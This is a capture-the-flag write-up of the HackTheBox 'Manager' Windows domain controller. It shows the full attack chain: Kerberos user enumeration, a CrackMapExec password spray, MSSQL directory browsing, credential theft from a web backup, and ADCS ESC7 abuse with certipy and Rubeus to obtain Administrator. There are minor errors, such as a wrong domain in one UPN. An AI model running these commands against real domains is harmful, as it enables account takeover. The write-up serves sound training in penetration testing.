Manager is a Medium machine on the HacktheBox platform, featuring user enumeration through Kerberos, credential-based Active Directory attacks with CrackMapExec, abuse of MSSQL guest access for enumeration, cleartext remote management user credentials leveraged using WinRM, and finally some ADCS attacks for Domain privilege escalation to Domain Admin.
Enumeration
Starting off with an Nmap scan for some service enumeration, specifying -sV and -sC to enumerate service banners and use default NSE scripts.
Nmap scan report for 10.10.11.236
Host is up (0.058s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-06 11:15:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-01-06T11:16:25+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-01-06T11:16:25+00:00; +7h00m00s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-06T11:06:03
|_Not valid after: 2054-01-06T11:06:03
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-01-06T11:16:25+00:00; +7h00m00s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-01-06T11:16:25+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-06T11:16:25+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
| date: 2024-01-06T11:15:48
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 5 22:16:25 2024 -- 1 IP address (1 host up) scanned in 88.36 seconds
From this enumeration, Manager is a Microsoft Windows Domain Controller. Attempt to harvest valid usernames from the Domain using a tool like Kerbrute, which you can find on GitHub.
Compile a list of usernames from the Kerbrute enumeration to utilize in a credential attack. Trying common credentials against the target Domain controller to obtain further access.
shellph1sh@kali:~/Assessments/Htb/Manager$ cat users.txt
ryan
guest
cheng
administrator
ryan
raven
operator
jinwoo
operator
shellph1sh@kali:~/Assessments/Htb/Manager$
Preform the credential-based attack with CrackMapExec. Attempting to try the username as the password for each account.
crackmapexec smb dc01.manager.htb -u users.txt -p users.txt --no-bruteforce
The CrackMapExec credential-based attack shows that the “operator” user has the same password as its username. Utilizing this information, we can proceed into credential utilizing enumeration, starting with some of the key services, such as MSSQL, WinRM, or SMB. Even without SysAdmin access to the MSSQL database, guest access could potentially be used to read the database.
We could also test if the user “operator” can authenticate to the WinRM service, providing unprivileged command execution. Unfortunately we find that the user “operator” is not apart of the “Remote Management Users” group, restricting us from authentication to WinRM.
We find that there’s no unique SMB shares the user “operator” has access to.
We can authenticate to the MSSQL service using the Impacket Suites “mssqlclient” script.
After authentication, looking through the various non-default databases yields no results. No password hashes exist that we can crack for further access.
We could still utilize other MSSQL functions at our disposal to further enumerate the target, such as xp_dirtree. We can use this to read through the host devices directories. This includes accessible files such as the web root at C:\Users\inetpub\wwwroot.
The uncovered file: “website-backup-27-07-23-old.zip” seems extremely valuable, and it resides in the web root. Download the file and inspect it for further system context.
When unzipping the file, a config file immediately stands out, written in the xml format. Inspection of this file notes plaintext credentials for the user “raven”.
We can utilize the same tactic with our newly gained credentials, enumerate the services using privileged access to try and gain a foothold onto the machine.
The first service to try is WinRM, because if “raven” is in the “Remote Management Users” group, WinRM could give us unprivileged command execution.
We can utilize evil-winrm to test access.
It works! We gain a foothold as the user “raven”
As part of standard Domain privilege escalation enumeration, drop a Certify binary to disk to test for vulnerable Active Directory Certificate Services (AD CS) certificate templates.
After execution of the Certify binary using the “find /vulnerable” arguments, note the access rights listed.
The Domain CA permissions include the “ManageCA” attribute on the “raven” user, meaning the “raven” user has full discretion on the Certificate Authorities (CA)’s configuration.
Because “raven” has full configuration permissions of the Domain CA, we can abuse the ESC7 vulnerability as apart of the ESC family of ADCS vulnerabilities.
ESC7 works by adding the unprivileged user as an “officer” of the Domain with the configuration rights, then requesting a certificate as Domain Admin. When the certificate request gets inevitably denied, the unprivileged user in the officer role can approve or issue the failed certificate request, allowing us to obtain a certificate as Administrator.
First add raven as an officer using the Linux python “certipy-ad” script.
Then enable the SubCA template
certipy ca -ca 'manager-DC01-CA' -enable-template SubCA raven@manager.htb -password <password>
Next make a request to the CA for the Administrators certificate
certipy req -username raven@manager.htb -password <password> -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@corp.local
Ensure to note down the request number.
Then use our officer role to issue the request.
certipy ca -ca 'manager-DC01-CA' -issue-request <id> -username raven@manager.htb -password <password>
Finally we can retrieve the approved certificate
certipy req -username raven@manager.htb -password <password> -ca manager-DC01-CA -target dc01.manager.htb -retrieve <id>
After obtaining the certificate, covert the certificate in base64 format so we can ask for an Administrator TGT from the Kerberos KDC.
cat administrator.pfx | base64 -w 0
Then utilize this certificate with Rubeus to get a TGT, and cache it into our current environment.
Rubeus.exe asktgt /user:administrator /certificate:MIIM7w[...]ECAggA /password:fakepass123 /nowrap /ptt
Now we’re operating in the network context of the Administrator, meaning we’re done with the box. If we want to gain command execution for the flag, all we have to do is utilize a DCSync attack with Mimikatz to obtain the Administrator’s NTLM hash, and we can utilize that to authenticate to WinRM with a Pass the Hash (PtT) attack.